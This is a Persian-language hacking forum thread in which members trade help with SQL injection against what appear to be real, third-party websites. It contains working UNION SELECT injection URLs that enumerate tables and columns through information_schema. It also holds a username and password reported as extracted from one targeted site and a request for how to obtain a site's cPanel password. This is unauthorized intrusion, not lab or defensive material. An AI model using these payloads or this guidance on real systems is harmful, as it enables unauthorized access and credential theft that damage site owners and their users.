[امیر]

درود:
دوستان من به یک موضوع در حمله sql برخوردم من تا این جا میرم دیگه گیر میکنم اگه میشه خودتون جواب بدین و ادرس سایت یا .. ندین

1-من تعداد column ها رو بدست اوردم
2-column اسیب پذیر رو بدست اوردم
3-ورژن 5 هست
4-بدست اوردن نام تیبل رو نمیدونم
5-بعد بلدم

فقط 4 رو مشکل دارم میشه کمکم کنید

[Amin_Mansouri]

پست زیر رو ببین

با مثال همه توضیح داده شده

http://parsicoders.com/showthread.php?ti...88#pid6888

[nimaarek]

4-بدست اوردن نام تیبل رو نمیدونم

یعنی چی نمیدونی ؟!
کاملتر توضیح بده ، بعدش یه سوال معمولا اول table ها رو در می ارن بعدش colum رو چطوریه که شما colum رو داری بعد table رو نداری ؟ :d

[امیر]

درود:
امین جان
گفتم ادرس نده فقط یک کلمه جواب می خوام بدشم لینک خراب بور اصلا سایتی باز نشد منظورم این است که

http://c2-europe.eu/news-full.php?id=-50...from+admin--

این رو دیروز داشتم هکش میکردم البته شانسی بود و شانسی admin در اومد اما چند تا دیگه بود نتونستم اسم تیبل رو حدس بزنم حتی از این راه هم رفتم اما به نتیجه نرسیدم

http://www.placeanad.ru/index.php?id_typ...ma.columns--

مثلا

این رو نام تیبل ها رو به دست اوردم اما در اخرین قسمت کد یعنی from n----n که قرار میدم ارور میده مشکل من تو به دست اودن تیبل اخره

چی گفتم دقیقا کی حالیش شد ؟

[nimaarek]

http://c2-europe.eu/news-full.php?id=-50...from+admin--

راجع به این باید بگم که username و password روی تیبل های آسیب پذیر نمیزاشتی درستش اینطوری میشه :
http://c2-europe.eu/news-full.php?id=-50...from+admin--
که پسورد میاد جای 5 که میشه :
5ejufe
و یوزر جای 7 که میشه :
michael
واسه بعدی هم باید از اول تست کنم که زمان میبره باید کمی صبر کنی چون فردا امتحان دارم :-d

[امیر]

درود:
دوستان دقت نکردید چه گفتم منظورم این هست که نام تیبل رو که ازش می خوهم اطلاعات بدس بیاریم رو نمیدونم چی کار باید بکنم (من خودم شانسی یا حدس میزنم ) روشی وجود داره که خودش نام تیبل ها رو بگه v5 و بالاتر

---

درود:
ادمین پیج پیدا نشد اما cpanel سایت پیدا شد اما پسورد cpanel فرق میکرد پسورد cpanel رو از کجا بدست بیارم

[nimaarek]

این اولی چرا بایپس نمیشه !!!!! عصابم و خورد کرد کسی تونسته ؟

[nimaarek]

این http://c2-europe.eu که اصلا راه بده نیست !

ولی اونیکی ورژن دیتابیس کمتر از 5 هست یعنی اینکه دیگه چیزی به اسم information_schema نداریم و شما باید تیبل ها و کلوم ها رو حدس بزنی

[امیر]

درود:
به طور مثال شما این تارگت رو که من دادی چجوری تیبلش رو پیدا کردی

http://www.site.ir/modules.php?option=co...80%8Ber_tb

member_tb
رو میگم .

[nimaarek]

اونکه مثل هلو هست :d
چون ورژن دیتابیس 5 به بالا هست فایل information_schema وجود داره پس "
تیبل:

کد:

http://www..****..ir/modules.php?option=comnews&do=view&id=-1157+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables

کلومن:

کد:

http://www.****.ir/modules.php?option=comnews&do=view&id=-1157+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.columns